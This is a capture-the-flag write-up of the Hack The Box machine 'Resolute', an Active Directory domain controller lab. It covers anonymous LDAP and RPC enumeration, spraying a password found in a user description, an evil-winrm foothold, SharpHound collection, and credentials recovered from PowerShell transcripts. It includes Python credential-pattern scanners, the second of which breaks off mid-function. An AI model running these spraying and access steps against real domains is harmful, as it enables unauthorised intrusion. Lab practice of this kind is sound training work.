Hack The Box: Resolute Writeup | Medium

Hack The Box: Resolute Writeup

Welcome to my detailed writeup of the medium-difficulty machine “Resolute” on Hack The Box. This writeup covers the steps taken to get an initial foothold on the domain controller and then escalate privileges on it.

TCP Enumeration

```
$ rustscan -a 10.129.201.75 --ulimit 5000 -g
10.129.201.75 -> [53,88,135,139,389,445,464,593,3268,9389,47001,49664,49665,49666,49667,49670,49676,49682,49677,49731]
```
```
$ nmap -p53,88,135,139,389,445,464,593,3268,9389,47001,49664,49665,49666,49667,49670,49676,49682,49677,49731 -sCV 10.129.201.75 -oN allPorts
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 21:11 CEST
Nmap scan report for 10.129.201.75
Host is up (0.037s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-07 17:18:30Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49731/tcp open  unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2024-09-07T10:19:20-07:00
| smb2-time: 
|   date: 2024-09-07T17:19:21
|_  start_date: 2024-09-07T17:14:13
|_clock-skew: mean: 27m02s, deviation: 4h02m30s, median: -1h52m58s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.23 seconds
```

UDP Enumeration

```
$ sudo nmap --top-ports 1500 -sU --min-rate 5000 -n -Pn 10.129.201.75 -oN allPorts.UDP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 21:11 CEST
Nmap scan report for 10.129.201.75
Host is up (0.038s latency).
Not shown: 1496 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
88/udp    open   kerberos-sec
123/udp   open   ntp
17673/udp closed unknown
20164/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
```

The initial scan already tells us a lot. DNS, Kerberos (88), LDAP (389/3268), the global catalog and SMB on a Windows Server 2016 host named RESOLUTE make this the domain controller for megabank.local, so we add the domain to /etc/hosts. Two details are worth noting for later: SMB signing is required (so NTLM relay to SMB is off the table), and the DC's clock is almost two hours behind ours (the Kerberos banner shows 17:18Z while the scan ran at 21:11 CEST, i.e. 19:11Z; nmap's clock-skew median agrees). The username and pre-auth checks below do not need a synchronised clock, but anything that requests and then uses a Kerberos ticket will fail with KRB_AP_ERR_SKEW, so keep `ntpdate`/`faketime` in mind.

SMB Enumeration

We can try to enumerate SMB with smbmap and smbclient over a null session, but we get nothing.

```
$ smbmap -H 10.129.201.75 -u ''
[+] IP: 10.129.201.75:445       Name: megabank.local
```

```
$ smbclient -L \\10.129.201.75 -U '' -N

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.201.75 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

```
$ smbclient -L \\10.129.201.75 -U 'null' -N
session setup failed: NT_STATUS_LOGON_FAILURE
```

LDAP Enumeration

Without any valid credentials we can already see several users in LDAP: the DC accepts anonymous binds and lets them read user objects.

```
$ ldapsearch -x -H ldap://megabank.local -D '' -w '' -b "DC=MEGABANK,DC=LOCAL" > ldapdump.txt
```


We can filter on the sAMAccountName attribute and build a user list.

```
$ ldapsearch -x -H ldap://megabank.local -D '' -w '' -b "CN=Users,DC=MEGABANK,DC=LOCAL" | grep sAMAccountName: | awk '{print $2}' > users.txt
```

This leaves a few lines that are not real accounts, but that doesn't matter, because kerbrute can now tell us which usernames actually exist. It sends one AS-REQ per name and distinguishes KDC_ERR_PREAUTH_REQUIRED (user exists) from KDC_ERR_C_PRINCIPAL_UNKNOWN (it doesn't), so no password is sent and nothing gets locked out.

```
$ /opt/kerbrute userenum --dc 10.129.201.75 users.txt -d megabank.local

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 09/07/24 - Ronnie Flathers @ropnop

2024/09/07 21:34:38 >  Using KDC(s):
2024/09/07 21:34:38 >   10.129.201.75:88

2024/09/07 21:34:38 >  [+] VALID USERNAME:       sunita@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       abigail@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       marcus@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       fred@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       sally@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       felicia@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       angela@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       gustavo@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       ulf@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       stevie@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       claire@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       paulo@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       annette@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       steve@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       annika@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       per@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       claude@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       melanie@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       zach@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       simon@megabank.local
2024/09/07 21:34:38 >  [+] VALID USERNAME:       naoki@megabank.local
2024/09/07 21:34:38 >  Done! Tested 38 usernames (21 valid) in 0.168 seconds
```

Save the VALID USERNAME lines of the kerbrute output to u.txt, then use awk to keep only the username part and write the clean list back to users.txt.

```
$ cat u.txt | awk '{print $7}' | awk -F@ '{print $1}' > users.txt && cat users.txt
sunita
abigail
marcus
fred
sally
felicia
angela
gustavo
ulf
stevie
claire
paulo
annette
steve
annika
per
claude
melanie
zach
simon
naoki
```

ASREPRoast (failed)

Now we have a list of valid usernames. That is useful because we can attempt an ASREPRoast: check whether any account has the DONT_REQUIRE_PREAUTH flag set and, if so, request an AS-REP for it without knowing the password. Part of that reply is encrypted with a key derived from the user's password, so it can be cracked offline.

GetNPUsers from the impacket suite performs this check for every user in the list.

```
$ impacket-GetNPUsers -no-pass -usersfile users.txt megabank.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
```

But no user has pre-authentication disabled, so there is nothing to crack.

Enumerating RPC -> Information Disclosure

With rpcclient we find that the same null session also lets us enumerate domain information, this time over MS-RPC (the SAMR interface) instead of LDAP.

```
$ rpcclient -N -U "" 10.129.201.75
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
```

Note that enumdomusers also lists ryan and marko, neither of whom showed up in the LDAP-derived list; most likely they live outside the CN=Users container that search was scoped to. For this kind of enumeration I like to use rpcenum, a bash tool by s4vitar that wraps rpcclient to pull information out of the domain.

Clone the repo.

```
$ git clone https://github.com/s4vitar/rpcenum
Cloning into 'rpcenum'...
remote: Enumerating objects: 54, done.
remote: Counting objects: 100% (19/19), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 54 (delta 15), reused 14 (delta 14), pack-reused 35 (from 1)
Receiving objects: 100% (54/54), 577.54 KiB | 3.24 MiB/s, done.
Resolving deltas: 100% (15/15), done.
```

With this tool we can list the domain users together with their descriptions (provided we have permission to read them).

```
$ sudo ./rpcenum -e DUsersInfo -i 10.129.201.75

[*] Listing domain users with description...


  +                 +                                                           +
  | User            | Description                                               |
  +                 +                                                           +
  | Administrator   | Built-in account for administering the computer/domain    |
  | Guest           | Built-in account for guest access to the computer/domain  |
  | krbtgt          | Key Distribution Center Service Account                   |
  | DefaultAccount  | A user account managed by the system.                     |
  | marko           | Account created. Password set to Welcome123!              |
  +                 +                                                           +
```

The description of user marko states that the account's initial password is Welcome123!. Storing passwords in the description attribute is a classic mistake: it is readable by every authenticated user and, as here, even over a null session.

We can check it with netexec.

```
$ nxc smb 10.129.201.75 -u marko -p 'Welcome123!'
SMB         10.129.201.75   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
```

The credential is not valid for marko, so it was presumably changed after the account was created. Since it looks like an onboarding default, it is worth trying it against every user we found. One password across many accounts is the safe direction to spray in, but check the lockout policy first so you know where the threshold is (for example `nxc smb 10.129.201.75 -u '' -p '' --pass-pol`, which should work over the same null session that rpcclient's SAMR calls did); a single attempt per account stays well under any sane threshold.

```
$ nxc smb 10.129.201.75 -u users.txt -p 'Welcome123!' --continue-on-success
SMB         10.129.201.75   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [+] megabank.local\melanie:Welcome123!
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB         10.129.201.75   445    RESOLUTE         [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
```

And we find that the user melanie still uses that password.

Abusing WinRM -> Foothold

```
$ nxc winrm 10.129.201.75 -u melanie -p 'Welcome123!'
WINRM       10.129.201.75   5985   RESOLUTE         [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM       10.129.201.75   5985   RESOLUTE         [+] megabank.local\melanie:Welcome123! (Pwn3d!)
```

The WinRM login works (for the winrm protocol, Pwn3d! only means the login and command execution succeeded), so melanie must be in the Remote Management Users group and we can use a tool such as evil-winrm to get a shell on the victim machine.

```
$ evil-winrm -i 10.129.201.75 -u melanie -p 'Welcome123!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
```

We can read the user flag.

```
*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
3f3fe89c6f34ca3e...
```

User Pivoting

The user melanie has no privileges beyond a domain user's defaults (SeMachineAccountPrivilege is granted to every domain user by default and only lets them join machines to the domain, which doesn't help here).

```
*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```

Listing C:\Users we see a profile for ryan, and `net user ryan` shows he belongs to a group called Contractors, which is a bit odd. Keep in mind that `net user` only prints direct group membership, so anything Contractors itself is nested in stays hidden here.

```
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        9/27/2019   7:05 AM                ryan


*Evil-WinRM* PS C:\Users> net user ryan
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/7/2024 11:02:02 AM
Password expires             Never
Password changeable          9/8/2024 11:02:02 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.
```

Bloodhound

Let's upload SharpHound to collect data about the domain and look for privilege-escalation paths with BloodHound.

We upload SharpHound through evil-winrm's upload function.

```
*Evil-WinRM* PS C:\ProgramData> upload SharpHound.exe

Info: Uploading /home/pointedsec/Desktop/resolute/content/SharpHound.exe to C:\ProgramData\SharpHound.exe

Data: 1402880 bytes of 1402880 bytes copied

Info: Upload successful!
```

Now we can run the collector.

```
*Evil-WinRM* PS C:\ProgramData> .\SharpHound.exe -c All -d megabank.local
2024-09-07T11:11:55.2405987-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-09-07T11:11:55.4124823-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-07T11:11:55.4437225-07:00|INFORMATION|Initializing SharpHound at 11:11 AM on 9/7/2024
2024-09-07T11:11:55.5843471-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for megabank.local : Resolute.megabank.local
2024-09-07T11:12:07.7250013-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-07T11:12:07.8968782-07:00|INFORMATION|Beginning LDAP search for megabank.local
2024-09-07T11:12:07.9593752-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-09-07T11:12:07.9593752-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-09-07T11:12:38.7876233-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 34 MB RAM
2024-09-07T11:13:08.8033238-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-09-07T11:13:14.2720152-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-09-07T11:13:14.3032660-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2024-09-07T11:13:14.4595214-07:00|INFORMATION|Status: 123 objects finished (+123 1.863636)/s -- Using 42 MB RAM
2024-09-07T11:13:14.4595214-07:00|INFORMATION|Enumeration finished in 00:01:06.5750879
2024-09-07T11:13:14.5532817-07:00|INFORMATION|Saving cache with stats: 80 ID to type mappings.
 80 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-09-07T11:13:14.5688900-07:00|INFORMATION|SharpHound Enumeration Completed at 11:13 AM on 9/7/2024! Happy Graphing!
```

We download the zip it generates with evil-winrm's download command.

```
-a----         9/7/2024  11:13 AM          13467 20240907111313_BloodHound.zip
```

Now we start neo4j, the database BloodHound uses.

```
$ sudo neo4j start
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:5212). It is available at http://localhost:7474
There may be a short delay until the server is ready.
```

Now we can open BloodHound and import the zip.

Once imported, we search for melanie and mark her as owned.

BloodHound shows that the Administrator user has a session on the DC.

But we find nothing directly relevant for the user ryan.

Winpeas

Let's run winPEAS to see whether it finds anything relevant.

First we upload it to the victim machine. I'm uploading the .bat version because for some reason I can't run the executables; they are reported as not valid for this version of the operating system.

```
*Evil-WinRM* PS C:\ProgramData> upload winPEAS.bat

Info: Uploading /home/pointedsec/Desktop/resolute/content/winPEAS.bat to C:\ProgramData\winPEAS.bat

Data: 48236 bytes of 48236 bytes copied

Info: Upload successful!
```

The winPEAS report turns up nothing.

We do, however, spot a hidden directory called PSTranscripts in the root of C:. That name means PowerShell transcription is (or was) enabled on this host: it writes every command typed in a session, including the parameter values PowerShell binds, to a plain text file. Any password passed on a command line therefore ends up on disk in cleartext, readable by whoever can read the transcript directory, which makes these files worth checking on any Windows host where you find them.

```
*Evil-WinRM* PS C:\> dir -force


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--         9/7/2024  11:26 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-         9/7/2024  10:14 AM      402653184 pagefile.sys
```

Inside it we find a hidden transcript file.

```
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
```

Reading the file we find this line.

```
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
```

That looks like a credential for ryan: Serv3r4Admin4cc123!. It was passed as an argument to `net use` inside an `Invoke-Expression`, and transcription logged the bound parameter value verbatim.
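Every transcript in a PSTranscripts tree can hold the same kind of leak, so here is a small scanner I wrote for this writeup (an added example, not part of the original) that flags command lines carrying credentials. The pattern set, the helper names and SAMPLE_TRANSCRIPT are my own; the sample is constructed to mimic the transcript above and is not the real file.

```python
"""Flag credentials captured in PowerShell transcript files.

Added example for this writeup, not the original author's code. SAMPLE_TRANSCRIPT
is a constructed stand-in for the file under C:\\PSTranscripts; the pattern
names and helper functions are my own.
"""
import re
import sys
from pathlib import Path

# Command shapes that commonly carry a secret on the command line. Transcription
# also logs the parameters bound by Invoke-Expression, which is how the
# net use credential above ended up on disk.
CREDENTIAL_PATTERNS = {
    # net use X: \\host\share <password> [/user:...]  (Resolute used a positional password)
    "net use with inline credential": re.compile(
        r"\bnet\s+use\b.*\\\\\S+\\\S+\s+\S+", re.IGNORECASE),
    "/user: switch (net use, runas, schtasks)": re.compile(r"/user:\S+", re.IGNORECASE),
    "plaintext secure string": re.compile(
        r"ConvertTo-SecureString\s+(?:-String\s+)?['\"]?[^'\"\s]+['\"]?\s+-AsPlainText",
        re.IGNORECASE),
    "password switch": re.compile(r"(?:-p(?:assword)?|--password)\s+\S+", re.IGNORECASE),
}

# Constructed sample: header shape and the leaked line mirror the real transcript.
SAMPLE_TRANSCRIPT = """\
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\\ryan
RunAs User: MEGABANK\\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
PS>Get-ChildItem C:\\Users
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\\\fs01\\backups ryan Serv3r4Admin4cc123!"
PS>$s = ConvertTo-SecureString 'Summer2019!' -AsPlainText -Force
PS>net use X: /delete
"""


def find_credentials(text):
    """Return (line_number, pattern_name, line) for every line that matches.

    One hit per line is enough for triage, so the first matching pattern wins."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        for name, rx in CREDENTIAL_PATTERNS.items():
            if rx.search(line):
                hits.append((n, name, line.strip()))
                break
    return hits


def scan_tree(root):
    """Scan every PowerShell_transcript.*.txt below root; returns {path: hits}."""
    results = {}
    for path in sorted(Path(root).rglob("PowerShell_transcript.*.txt")):
        hits = find_credentials(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            results[str(path)] = hits
    return results


if __name__ == "__main__":
    # Usage: python3 scan_transcripts.py /path/to/PSTranscripts  (no arg: built-in sample)
    if len(sys.argv) > 1:
        found = scan_tree(sys.argv[1])
    else:
        found = {"<sample>": find_credentials(SAMPLE_TRANSCRIPT)}
    for path, hits in found.items():
        for n, name, line in hits:
            print(f"{path}:{n}: [{name}] {line}")
```

Run it against a copy of the PSTranscripts directory (evil-winrm's download works for that) rather than on the target, and expect some false positives from the broad `/user:` and `-p` patterns; the point is to shortlist lines for a human to read, not to extract secrets automatically.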

Let's check this credential with netexec. Oddly, it reports Pwn3d!, although we know this user is not a member of Domain Admins.

```
$ nxc smb 10.129.201.75 -u ryan -p 'Serv3r4Admin4cc123!'
SMB         10.129.201.75   445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.129.201.75   445    RESOLUTE         [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
```

ryan belongs to the Contractors group, which in turn is a member of DnsAdmins and Remote Management Users. This is the nested membership that `net user` did not show and BloodHound does.
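That relationship was already present in the anonymous LDAP dump we took at the start. As an added example (my own code, not from the writeup), the script below parses ldapsearch LDIF output such as ldapdump.txt, extracts a kerbrute-ready user list (the job the awk pipeline did earlier, but handling folded lines and base64 `::` values, which awk silently mangles), and then expands nested group membership to show why `net user` reports only Contractors while BloodHound reports DnsAdmins. SAMPLE_LDIF is constructed to mirror this box's objects; the OU names in it are assumptions. Whether `memberOf`/`member` are readable anonymously depends on the DC, so when you run it as `python3 ldif_groups.py ldapdump.txt`, treat an empty result as "not visible", not "not a member".

```python
"""Parse an ldapsearch LDIF dump into a user list and resolve nested groups.

Added example, not code from the original writeup. SAMPLE_LDIF is a constructed
stand-in for ldapdump.txt (ryan -> Contractors -> DnsAdmins); OU names are assumed.
"""
import base64
import sys
from collections import defaultdict

SAMPLE_LDIF = """\
# constructed sample, not the real dump
dn: CN=Ryan Bertrand,OU=Contractors,DC=megabank,DC=local
objectClass: user
cn: Ryan Bertrand
sAMAccountName: ryan
memberOf: CN=Contractors,OU=Groups,DC=megabank,DC=local

dn: CN=melanie,CN=Users,DC=megabank,DC=local
objectClass: user
cn: melanie
sAMAccountName: melanie

dn: CN=RESOLUTE,OU=Domain Controllers,DC=megabank,DC=local
objectClass: user
objectClass: computer
cn: RESOLUTE
sAMAccountName: RESOLUTE$

dn: CN=Contractors,OU=Groups,DC=megabank,DC=local
objectClass: group
cn: Contractors
member: CN=Ryan Bertrand,OU=Contractors,DC=megabank,DC=local
memberOf: CN=DnsAdmins,CN=Users,DC=megabank,DC=local
memberOf: CN=Remote Management Users,CN=Builtin,DC=megabank,DC=local

dn: CN=DnsAdmins,CN=Users,DC=megabank,DC=local
objectClass: group
cn: DnsAdmins
description:: RE5TIEFkbWluaXN0cmF0b3JzIEdyb3Vw
member: CN=Contractors,OU=Groups,DC=megabank,DC=local

dn: CN=Remote Management Users,CN=Builtin,DC=megabank,DC=lo
 cal
objectClass: group
cn: Remote Management Users

search: 2
result: 0 Success
"""


def parse_ldif(text):
    """Return a list of entries, each a dict attr -> [values]."""
    logical = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:      # folded continuation line
            logical[-1] += raw[1:]
        else:
            logical.append(raw)
    entries, current = [], None
    for line in logical:
        if not line.strip():                      # blank line ends an entry
            if current is not None:
                entries.append(dict(current))
                current = None
            continue
        if line.startswith("#"):
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):                 # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if current is None:
            current = defaultdict(list)
        current[attr.strip()].append(value)
    if current is not None:
        entries.append(dict(current))
    return entries


def user_accounts(entries):
    """sAMAccountNames of user objects. Computer objects also carry objectClass
    'user', so drop the trailing-$ machine accounts kerbrute does not need."""
    return [sam for e in entries if "user" in e.get("objectClass", [])
            for sam in e.get("sAMAccountName", []) if not sam.endswith("$")]


def groups_of(entries, sam, transitive=True):
    """Group CNs for one account. transitive=False is what `net user` prints;
    transitive=True follows memberOf (backlink) and group member (forward link)
    edges, which is how ryan turns out to be in DnsAdmins."""
    by_dn = {e["dn"][0]: e for e in entries if "dn" in e}
    parents = defaultdict(set)
    for dn, e in by_dn.items():
        for g in e.get("memberOf", []):
            parents[dn].add(g)
        for m in e.get("member", []):
            parents[m].add(dn)
    start = [dn for dn, e in by_dn.items() if sam in e.get("sAMAccountName", [])]
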